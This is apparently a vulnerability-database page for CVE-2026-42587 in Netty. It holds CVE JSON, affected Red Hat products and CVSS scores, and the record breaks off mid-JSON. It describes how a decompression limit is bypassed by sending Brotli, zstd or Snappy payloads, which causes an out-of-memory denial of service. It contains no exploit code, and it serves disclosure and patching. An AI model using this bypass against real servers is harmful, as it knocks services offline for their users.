Action not permitted
Modal body text goes here.
Modal Title
Modal Body
CVE-2026-42587 (GCVE-0-2026-42587)
Vulnerability from cvelistv5 – Published: 2026-05-13 18:22 – Updated: 2026-07-03 12:04| URL | Tags |
|---|---|
| https://github.com/netty/netty/security/advisorie… | x_refsource_CONFIRM |
| https://access.redhat.com/security/cve/CVE-2026-42587 | vdb-entryx_refsource_REDHAT |
| https://bugzilla.redhat.com/show_bug.cgi?id=2477220 | issue-trackingx_refsource_REDHAT |
| https://security.access.redhat.com/data/csaf/v2/v… | x_sadp-csaf-vex |
| https://access.redhat.com/errata/RHSA-2026:28010 | vendor-advisoryx_refsource_REDHAT |
| https://access.redhat.com/errata/RHSA-2026:25123 | vendor-advisoryx_refsource_REDHAT |
| https://access.redhat.com/errata/RHSA-2026:23808 | vendor-advisoryx_refsource_REDHAT |
| https://access.redhat.com/errata/RHSA-2026:24502 | vendor-advisoryx_refsource_REDHAT |
| https://access.redhat.com/errata/RHSA-2026:34608 | vendor-advisoryx_refsource_REDHAT |
| Vendor | Product | Version | |
|---|---|---|---|
| netty | netty |
Affected:
>= 4.2.0.Alpha1, < 4.2.13.Final
Affected: < 4.1.133.Final |
|
| io.netty | netty-codec-http |
Affected:
>= 4.2.0.Alpha1, < 4.2.13.Final
Affected: < 4.1.133.Final |
|
| io.netty | netty-codec-http2 |
Affected:
>= 4.2.0.Alpha1, < 4.2.13.Final
Affected: < 4.1.133.Final |
|
| Red Hat | Cryostat 4 on RHEL 9 |
cpe:/a:redhat:cryostat:4::el9 |
|
| Red Hat | Red Hat OpenShift Dev Spaces 3.28 |
cpe:/a:redhat:openshift_devspaces:3.28::el9 |
|
| Red Hat | Red Hat build of Quarkus 3.27.4 |
cpe:/a:redhat:quarkus:3.27::el8 |
|
| Red Hat | Red Hat build of Quarkus 3.33.2 |
cpe:/a:redhat:quarkus:3.33::el8 |
|
| Red Hat | Streams for Apache Kafka 2.9.4 |
cpe:/a:redhat:amq_streams:2.9::el9 |
|
| Red Hat | Cryostat 4 |
cpe:/a:redhat:cryostat:4 |
|
| Red Hat | OpenShift Serverless |
cpe:/a:redhat:serverless:1 |
|
| Red Hat | Red Hat AMQ Broker 7 |
cpe:/a:redhat:amq_broker:7 |
|
| Red Hat | Red Hat AMQ Clients |
cpe:/a:redhat:amq_clients:2023 |
|
| Red Hat | Red Hat build of Apache Camel for Spring Boot 4 |
cpe:/a:redhat:camel_spring_boot:4 |
|
| Red Hat | Red Hat build of Apicurio Registry 2 |
cpe:/a:redhat:service_registry:2 |
|
| Red Hat | Red Hat build of Apicurio Registry 3 |
cpe:/a:redhat:apicurio_registry:3 |
|
| Red Hat | Red Hat build of Debezium 3 |
cpe:/a:redhat:debezium:3 |
|
| Red Hat | Red Hat Build of Keycloak |
cpe:/a:redhat:build_keycloak: |
|
| Red Hat | Red Hat build of OptaPlanner 8 |
cpe:/a:redhat:optaplanner:::el6 |
|
| Red Hat | Red Hat Data Grid 8 |
cpe:/a:redhat:jboss_data_grid:8 |
|
| Red Hat | Red Hat Fuse 7 |
cpe:/a:redhat:jboss_fuse:7 |
|
| Red Hat | Red Hat JBoss Enterprise Application Platform 7 |
cpe:/a:redhat:jboss_enterprise_application_platform:7 |
|
| Red Hat | Red Hat JBoss Enterprise Application Platform 8 |
cpe:/a:redhat:jboss_enterprise_application_platform:8 |
|
| Red Hat | Red Hat JBoss Enterprise Application Platform Expansion Pack |
cpe:/a:redhat:jbosseapxp |
|
| Red Hat | Red Hat OpenShift AI (RHOAI) |
cpe:/a:redhat:openshift_ai |
|
| Red Hat | Red Hat OpenShift Dev Spaces |
cpe:/a:redhat:openshift_devspaces:3 |
|
| Red Hat | Red Hat Process Automation 7 |
cpe:/a:redhat:jboss_enterprise_bpms_platform:7 |
|
| Red Hat | Red Hat Single Sign-On 7 |
cpe:/a:redhat:red_hat_single_sign_on:7 |
|
| Red Hat | streams for Apache Kafka 2 |
cpe:/a:redhat:amq_streams:2 |
|
| Red Hat | streams for Apache Kafka 3 |
cpe:/a:redhat:amq_streams:3 |
|
| Red Hat | Red Hat build of Apache Camel 4 for Quarkus 3 |
cpe:/a:redhat:camel_quarkus:3 |
|
| Red Hat | Red Hat Enterprise Linux AI (RHEL AI) 3 |
cpe:/a:redhat:enterprise_linux_ai:3 |
|
| Red Hat | Red Hat Satellite 6 |
cpe:/a:redhat:satellite:6 |
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2026-42587",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-05-13T18:43:31.138358Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-06-23T15:52:26.728Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"references": [
{
"tags": [
"exploit"
],
"url": "https://github.com/netty/netty/security/advisories/GHSA-f6hv-jmp6-3vwv"
}
],
"title": "CISA ADP Vulnrichment"
},
{
"affected": [
{
"cpes": [
"cpe:/a:redhat:cryostat:4::el9"
],
"defaultStatus": "affected",
"product": "Cryostat 4 on RHEL 9",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:openshift_devspaces:3.28::el9"
],
"defaultStatus": "affected",
"product": "Red Hat OpenShift Dev Spaces 3.28",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:quarkus:3.27::el8"
],
"defaultStatus": "affected",
"product": "Red Hat build of Quarkus 3.27.4",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:quarkus:3.33::el8"
],
"defaultStatus": "affected",
"product": "Red Hat build of Quarkus 3.33.2",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:amq_streams:2.9::el9"
],
"defaultStatus": "affected",
"product": "Streams for Apache Kafka 2.9.4",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:cryostat:4"
],
"defaultStatus": "affected",
"product": "Cryostat 4",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:serverless:1"
],
"defaultStatus": "affected",
"product": "OpenShift Serverless",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:amq_broker:7"
],
"defaultStatus": "affected",
"product": "Red Hat AMQ Broker 7",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:amq_clients:2023"
],
"defaultStatus": "affected",
"product": "Red Hat AMQ Clients",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:camel_spring_boot:4"
],
"defaultStatus": "affected",
"product": "Red Hat build of Apache Camel for Spring Boot 4",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:service_registry:2"
],
"defaultStatus": "affected",
"product": "Red Hat build of Apicurio Registry 2",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:apicurio_registry:3"
],
"defaultStatus": "affected",
"product": "Red Hat build of Apicurio Registry 3",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:debezium:3"
],
"defaultStatus": "affected",
"product": "Red Hat build of Debezium 3",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:build_keycloak:"
],
"defaultStatus": "affected",
"product": "Red Hat Build of Keycloak",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:optaplanner:::el6"
],
"defaultStatus": "affected",
"product": "Red Hat build of OptaPlanner 8",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:jboss_data_grid:8"
],
"defaultStatus": "affected",
"product": "Red Hat Data Grid 8",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:jboss_fuse:7"
],
"defaultStatus": "affected",
"product": "Red Hat Fuse 7",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:jboss_enterprise_application_platform:7"
],
"defaultStatus": "affected",
"product": "Red Hat JBoss Enterprise Application Platform 7",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:jboss_enterprise_application_platform:8"
],
"defaultStatus": "affected",
"product": "Red Hat JBoss Enterprise Application Platform 8",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:jbosseapxp"
],
"defaultStatus": "affected",
"product": "Red Hat JBoss Enterprise Application Platform Expansion Pack",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:openshift_ai"
],
"defaultStatus": "affected",
"product": "Red Hat OpenShift AI (RHOAI)",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:openshift_devspaces:3"
],
"defaultStatus": "affected",
"product": "Red Hat OpenShift Dev Spaces",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:jboss_enterprise_bpms_platform:7"
],
"defaultStatus": "affected",
"product": "Red Hat Process Automation 7",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:red_hat_single_sign_on:7"
],
"defaultStatus": "affected",
"product": "Red Hat Single Sign-On 7",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:amq_streams:2"
],
"defaultStatus": "affected",
"product": "streams for Apache Kafka 2",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:amq_streams:3"
],
"defaultStatus": "affected",
"product": "streams for Apache Kafka 3",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:camel_quarkus:3"
],
"defaultStatus": "unaffected",
"product": "Red Hat build of Apache Camel 4 for Quarkus 3",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:enterprise_linux_ai:3"
],
"defaultStatus": "unaffected",
"product": "Red Hat Enterprise Linux AI (RHEL AI) 3",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:satellite:6"
],
"defaultStatus": "unaffected",
"product": "Red Hat Satellite 6",
"vendor": "Red Hat"
}
],
"datePublic": "2026-05-13T18:22:21.699Z",
"descriptions": [
{
"lang": "en",
"value": "A flaw was found in Netty. A remote attacker can bypass the configured decompression limit in the HttpContentDecompressor by sending a specially crafted compressed payload using Brotli (br), Zstandard (zstd), or Snappy content encodings. This can lead to unbounded memory allocation, resulting in an out-of-memory Denial of Service (DoS) for the affected system."
}
],
"metrics": [
{
"other": {
"content": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"value": "Important"
},
"type": "Red Hat severity rating"
}
},
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"format": "CVSS"
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-770",
"description": "Allocation of Resources Without Limits or Throttling",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-07-03T12:04:48.821Z",
"orgId": "0b0ca135-0b70-47e7-9f44-1890c2a1c46c",
"shortName": "redhat-SADP"
},
"references": [
{
"tags": [
"vdb-entry",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/security/cve/CVE-2026-42587"
},
{
"name": "RHBZ#2477220",
"tags": [
"issue-tracking",
"x_refsource_REDHAT"
],
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2477220"
},
{
"tags": [
"x_sadp-csaf-vex"
],
"url": "https://security.access.redhat.com/data/csaf/v2/vex/2026/cve-2026-42587.json"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:28010"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:25123"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:23808"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:24502"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:34608"
}
],
"solutions": [
{
"lang": "en",
"value": "RHSA-2026:28010: Cryostat 4 on RHEL 9"
},
{
"lang": "en",
"value": "RHSA-2026:25123: Red Hat OpenShift Dev Spaces 3.28"
},
{
"lang": "en",
"value": "RHSA-2026:23808: Red Hat build of Quarkus 3.27.4"
},
{
"lang": "en",
"value": "RHSA-2026:24502: Red Hat build of Quarkus 3.33.2"
},
{
"lang": "en",
"value": "RHSA-2026:34608: Streams for Apache Kafka 2.9.4"
}
],
"timeline": [
{
"lang": "en",
"time": "2026-05-13T19:01:35.415Z",
"value": "Reported to Red Hat."
},
{
"lang": "en",
"time": "2026-05-13T18:22:21.699Z",
"value": "Made public."
}
],
"title": "netty: io.netty/netty-codec-http: io.netty/netty-codec-http2: Netty: Denial of Service via unbounded memory allocation in HTTP content decompression",
"workarounds": [
{
"lang": "en",
"value": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base, or stability."
}
],
"x_adpType": "supplier",
"x_generator": {
"engine": "sadp-cli 1.0.0"
}
}
],
"cna": {
"affected": [
{
"product": "netty",
"vendor": "netty",
"versions": [
{
"status": "affected",
"version": "\u003e= 4.2.0.Alpha1, \u003c 4.2.13.Final"
},
{
"status": "affected",
"version": "\u003c 4.1.133.Final"
}
]
},
{
"product": "netty-codec-http",
"vendor": "io.netty",
"versions": [
{
"status": "affected",
"version": "\u003e= 4.2.0.Alpha1, \u003c 4.2.13.Final"
},
{
"status": "affected",
"version": "\u003c 4.1.133.Final"
}
]
},
{
"product": "netty-codec-http2",
"vendor": "io.netty",
"versions": [
{
"status": "affected",
"version": "\u003e= 4.2.0.Alpha1, \u003c 4.2.13.Final"
},
{
"status": "affected",
"version": "\u003c 4.1.133.Final"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Netty is an asynchronous, event-driven network application framework. Prior to 4.2.13.Final and 4.1.133.Final, HttpContentDecompressor accepts a maxAllocation parameter to limit decompression buffer size and prevent decompression bomb attacks. This limit is correctly enforced for gzip and deflate encodings via ZlibDecoder, but is silently ignored when the content encoding is br (Brotli), zstd, or snappy. An attacker can bypass the configured decompression limit by sending a compressed payload with Content-Encoding: br instead of Content-Encoding: gzip, causing unbounded memory allocation and out-of-memory denial of service. The same vulnerability exists in DelegatingDecompressorFrameListener for HTTP/2 connections. This vulnerability is fixed in 4.2.13.Final and 4.1.133.Final."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-400",
"description": "CWE-400: Uncontrolled Resource Consumption",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-05-13T18:22:21.699Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/netty/netty/security/advisories/GHSA-f6hv-jmp6-3vwv",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/netty/netty/security/advisories/GHSA-f6hv-jmp6-3vwv"
}
],
"source": {
"advisory": "GHSA-f6hv-jmp6-3vwv",
"discovery": "UNKNOWN"
},
"title": "Netty: HttpContentDecompressor maxAllocation bypass via Content-Encoding: br/zstd/snappy enables decompression bomb DoS"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2026-42587",
"datePublished": "2026-05-13T18:22:21.699Z",
"dateReserved": "2026-04-28T17:26:12.086Z",
"dateUpdated": "2026-07-03T12:04:48.821Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2",
"vulnerability-lookup:meta": {
"epss": {
"cve": "CVE-2026-42587",
"date": "2026-07-05",
"epss": "0.00863",
"percentile": "0.5418"
},
"nvd": "{\"cve\":{\"id\":\"CVE-2026-42587\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-05-13T19:17:24.460\",\"lastModified\":\"2026-07-03T13:17:13.387\",\"vulnStatus\":\"Modified\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Netty is an asynchronous, event-driven network application framework. Prior to 4.2.13.Final and 4.1.133.Final, HttpContentDecompressor accepts a maxAllocation parameter to limit decompression buffer size and prevent decompression bomb attacks. This limit is correctly enforced for gzip and deflate encodings via ZlibDecoder, but is silently ignored when the content encoding is br (Brotli), zstd, or snappy. An attacker can bypass the configured decompression limit by sending a compressed payload with Content-Encoding: br instead of Content-Encoding: gzip, causing unbounded memory allocation and out-of-memory denial of service. The same vulnerability exists in DelegatingDecompressorFrameListener for HTTP/2 connections. This vulnerability is fixed in 4.2.13.Final and 4.1.133.Final.\"}],\"affected\":[{\"source\":\"security-advisories@github.com\",\"affectedData\":[{\"vendor\":\"netty\",\"product\":\"netty\",\"versions\":[{\"version\":\"\u003e= 4.2.0.Alpha1, \u003c 4.2.13.Final\",\"status\":\"affected\"},{\"version\":\"\u003c 4.1.133.Final\",\"status\":\"affected\"}]},{\"vendor\":\"io.netty\",\"product\":\"netty-codec-http\",\"versions\":[{\"version\":\"\u003e= 4.2.0.Alpha1, \u003c 4.2.13.Final\",\"status\":\"affected\"},{\"version\":\"\u003c 4.1.133.Final\",\"status\":\"affected\"}]},{\"vendor\":\"io.netty\",\"product\":\"netty-codec-http2\",\"versions\":[{\"version\":\"\u003e= 4.2.0.Alpha1, \u003c 4.2.13.Final\",\"status\":\"affected\"},{\"version\":\"\u003c 4.1.133.Final\",\"status\":\"affected\"}]}]},{\"source\":\"0b0ca135-0b70-47e7-9f44-1890c2a1c46c\",\"affectedData\":[{\"vendor\":\"Red Hat\",\"product\":\"Cryostat 4 on RHEL 9\",\"defaultStatus\":\"affected\",\"cpes\":[\"cpe:/a:redhat:cryostat:4::el9\"]},{\"vendor\":\"Red Hat\",\"product\":\"Red Hat OpenShift Dev Spaces 3.28\",\"defaultStatus\":\"affected\",\"cpes\":[\"cpe:/a:redhat:openshift_devspaces:3.28::el9\"]},{\"vendor\":\"Red Hat\",\"product\":\"Red Hat build of Quarkus 3.27.4\",\"defaultStatus\":\"affected\",\"cpes\":[\"cpe:/a:redhat:quarkus:3.27::el8\"]},{\"vendor\":\"Red Hat\",\"product\":\"Red Hat build of Quarkus 3.33.2\",\"defaultStatus\":\"affected\",\"cpes\":[\"cpe:/a:redhat:quarkus:3.33::el8\"]},{\"vendor\":\"Red Hat\",\"product\":\"Streams for Apache Kafka 2.9.4\",\"defaultStatus\":\"affected\",\"cpes\":[\"cpe:/a:redhat:amq_streams:2.9::el9\"]},{\"vendor\":\"Red Hat\",\"product\":\"Cryostat 4\",\"defaultStatus\":\"affected\",\"cpes\":[\"cpe:/a:redhat:cryostat:4\"]},{\"vendor\":\"Red Hat\",\"product\":\"OpenShift Serverless\",\"defaultStatus\":\"affected\",\"cpes\":[\"cpe:/a:redhat:serverless:1\"]},{\"vendor\":\"Red Hat\",\"product\":\"Red Hat AMQ Broker 7\",\"defaultStatus\":\"affected\",\"cpes\":[\"cpe:/a:redhat:amq_broker:7\"]},{\"vendor\":\"Red Hat\",\"product\":\"Red Hat AMQ Clients\",\"defaultStatus\":\"affected\",\"cpes\":[\"cpe:/a:redhat:amq_clients:2023\"]},{\"vendor\":\"Red Hat\",\"product\":\"Red Hat build of Apache Camel for Spring Boot 4\",\"defaultStatus\":\"affected\",\"cpes\":[\"cpe:/a:redhat:camel_spring_boot:4\"]},{\"vendor\":\"Red Hat\",\"product\":\"Red Hat build of Apicurio Registry 2\",\"defaultStatus\":\"affected\",\"cpes\":[\"cpe:/a:redhat:service_registry:2\"]},{\"vendor\":\"Red Hat\",\"product\":\"Red Hat build of Apicurio Registry 3\",\"defaultStatus\":\"affected\",\"cpes\":[\"cpe:/a:redhat:apicurio_registry:3\"]},{\"vendor\":\"Red Hat\",\"product\":\"Red Hat build of Debezium 3\",\"defaultStatus\":\"affected\",\"cpes\":[\"cpe:/a:redhat:debezium:3\"]},{\"vendor\":\"Red Hat\",\"product\":\"Red Hat Build of Keycloak\",\"defaultStatus\":\"affected\",\"cpes\":[\"cpe:/a:redhat:build_keycloak:\"]},{\"vendor\":\"Red Hat\",\"product\":\"Red Hat build of OptaPlanner 8\",\"defaultStatus\":\"affected\",\"cpes\":[\"cpe:/a:redhat:optaplanner:::el6\"]},{\"vendor\":\"Red Hat\",\"product\":\"Red Hat Data Grid 8\",\"defaultStatus\":\"affected\",\"cpes\":[\"cpe:/a:redhat:jboss_data_grid:8\"]},{\"vendor\":\"Red Hat\",\"product\":\"Red Hat Fuse 7\",\"defaultStatus\":\"affected\",\"cpes\":[\"cpe:/a:redhat:jboss_fuse:7\"]},{\"vendor\":\"Red Hat\",\"product\":\"Red Hat JBoss Enterprise Application Platform 7\",\"defaultStatus\":\"affected\",\"cpes\":[\"cpe:/a:redhat:jboss_enterprise_application_platform:7\"]},{\"vendor\":\"Red Hat\",\"product\":\"Red Hat JBoss Enterprise Application Platform 8\",\"defaultStatus\":\"affected\",\"cpes\":[\"cpe:/a:redhat:jboss_enterprise_application_platform:8\"]},{\"vendor\":\"Red Hat\",\"product\":\"Red Hat JBoss Enterprise Application Platform Expansion Pack\",\"defaultStatus\":\"affected\",\"cpes\":[\"cpe:/a:redhat:jbosseapxp\"]},{\"vendor\":\"Red Hat\",\"product\":\"Red Hat OpenShift AI (RHOAI)\",\"defaultStatus\":\"affected\",\"cpes\":[\"cpe:/a:redhat:openshift_ai\"]},{\"vendor\":\"Red Hat\",\"product\":\"Red Hat OpenShift Dev Spaces\",\"defaultStatus\":\"affected\",\"cpes\":[\"cpe:/a:redhat:openshift_devspaces:3\"]},{\"vendor\":\"Red Hat\",\"product\":\"Red Hat Process Automation 7\",\"defaultStatus\":\"affected\",\"cpes\":[\"cpe:/a:redhat:jboss_enterprise_bpms_platform:7\"]},{\"vendor\":\"Red Hat\",\"product\":\"Red Hat Single Sign-On 7\",\"defaultStatus\":\"affected\",\"cpes\":[\"cpe:/a:redhat:red_hat_single_sign_on:7\"]},{\"vendor\":\"Red Hat\",\"product\":\"streams for Apache Kafka 2\",\"defaultStatus\":\"affected\",\"cpes\":[\"cpe:/a:redhat:amq_streams:2\"]},{\"vendor\":\"Red Hat\",\"product\":\"streams for Apache Kafka 3\",\"defaultStatus\":\"affected\",\"cpes\":[\"cpe:/a:redhat:amq_streams:3\"]},{\"vendor\":\"Red Hat\",\"product\":\"Red Hat build of Apache Camel 4 for Quarkus 3\",\"defaultStatus\":\"unaffected\",\"cpes\":[\"cpe:/a:redhat:camel_quarkus:3\"]},{\"vendor\":\"Red Hat\",\"product\":\"Red Hat Enterprise Linux AI (RHEL AI) 3\",\"defaultStatus\":\"unaffected\",\"cpes\":[\"cpe:/a:redhat:enterprise_linux_ai:3\"]},{\"vendor\":\"Red Hat\",\"product\":\"Red Hat Satellite 6\",\"defaultStatus\":\"unaffected\",\"cpes\":[\"cpe:/a:redhat:satellite:6\"]}]}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\",\"baseScore\":7.5,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":3.9,\"impactScore\":3.6},{\"source\":\"0b0ca135-0b70-47e7-9f44-1890c2a1c46c\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\",\"baseScore\":7.5,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":3.9,\"impactScore\":3.6}],\"ssvcV203\":[{\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\",\"ssvcData\":{\"timestamp\":\"2026-05-13T18:43:31.138358Z\",\"id\":\"CVE-2026-42587\",\"options\":[{\"exploitation\":\"poc\"},{\"automatable\":\"yes\"},{\"technicalImpact\":\"partial\"}],\"role\":\"CISA Coordinator\",\"version\":\"2.0.3\"}}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-400\"}]},{\"source\":\"0b0ca135-0b70-47e7-9f44-1890c2a1c46c\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-770\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:netty:netty:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"4.1.133\",\"matchCriteriaId\":\"DFE205A5-2C43-40C9-A2FF-CF6759B8D861\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:netty:netty:*:*:*:*:*:*:*:*\",\"versionStartIncluding\":\"4.2.0\",\"versionEndExcluding\":\"4.2.13\",\"matchCriteriaId\":\"D94A720F-9CED-4BE9-8C37-FD9E2FD28472\"}]}]}],\"references\":[{\"url\":\"https://github.com/netty/netty/security/advisories/GHSA-f6hv-jmp6-3vwv\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Mitigation\",\"Vendor Advisory\"]},{\"url\":\"https://access.redhat.com/errata/RHSA-2026:23808\",\"source\":\"0b0ca135-0b70-47e7-9f44-1890c2a1c46c\"},{\"url\":\"https://access.redhat.com/errata/RHSA-2026:24502\",\"source\":\"0b0ca135-0b70-47e7-9f44-1890c2a1c46c\"},{\"url\":\"https://access.redhat.com/errata/RHSA-2026:25123\",\"source\":\"0b0ca135-0b70-47e7-9f44-1890c2a1c46c\"},{\"url\":\"https://access.redhat.com/errata/RHSA-2026:28010\",\"source\":\"0b0ca135-0b70-47e7-9f44-1890c2a1c46c\"},{\"url\":\"https://access.redhat.com/errata/RHSA-2026:34608\",\"source\":\"0b0ca135-0b70-47e7-9f44-1890c2a1c46c\"},{\"url\":\"https://access.redhat.com/security/cve/CVE-2026-42587\",\"source\":\"0b0ca135-0b70-47e7-9f44-1890c2a1c46c\"},{\"url\":\"https://bugzilla.redhat.com/show_bug.cgi?id=2477220\",\"source\":\"0b0ca135-0b70-47e7-9f44-1890c2a1c46c\"},{\"url\":\"https://github.com/netty/netty/security/advisories/GHSA-f6hv-jmp6-3vwv\",\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\",\"tags\":[\"Exploit\",\"Mitigation\",\"Vendor Advisory\"]},{\"url\":\"https://security.access.redhat.com/data/csaf/v2/vex/2026/cve-2026-42587.json\",\"source\":\"0b0ca135-0b70-47e7-9f44-1890c2a1c46c\"}]}}",
"vulnrichment": {
"containers": "{\"adp\": [{\"title\": \"netty: io.netty/netty-codec-http: io.netty/netty-codec-http2: Netty: Denial of Service via unbounded memory allocation in HTTP content decompression\", \"metrics\": [{\"other\": {\"type\": \"Red Hat severity rating\", \"content\": {\"value\": \"Important\", \"namespace\": \"https://access.redhat.com/security/updates/classification/\"}}}, {\"format\": \"CVSS\", \"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 7.5, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\", \"integrityImpact\": \"NONE\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"HIGH\", \"privilegesRequired\": \"NONE\", \"confidentialityImpact\": \"NONE\"}}], \"affected\": [{\"cpes\": [\"cpe:/a:redhat:cryostat:4::el9\"], \"vendor\": \"Red Hat\", \"product\": \"Cryostat 4 on RHEL 9\", \"defaultStatus\": \"affected\"}, {\"cpes\": [\"cpe:/a:redhat:openshift_devspaces:3.28::el9\"], \"vendor\": \"Red Hat\", \"product\": \"Red Hat OpenShift Dev Spaces 3.28\", \"defaultStatus\": \"affected\"}, {\"cpes\": [\"cpe:/a:redhat:quarkus:3.27::el8\"], \"vendor\": \"Red Hat\", \"product\": \"Red Hat build of Quarkus 3.27.4\", \"defaultStatus\": \"affected\"}, {\"cpes\": [\"cpe:/a:redhat:quarkus:3.33::el8\"], \"vendor\": \"Red Hat\", \"product\": \"Red Hat build of Quarkus 3.33.2\", \"defaultStatus\": \"affected\"}, {\"cpes\": 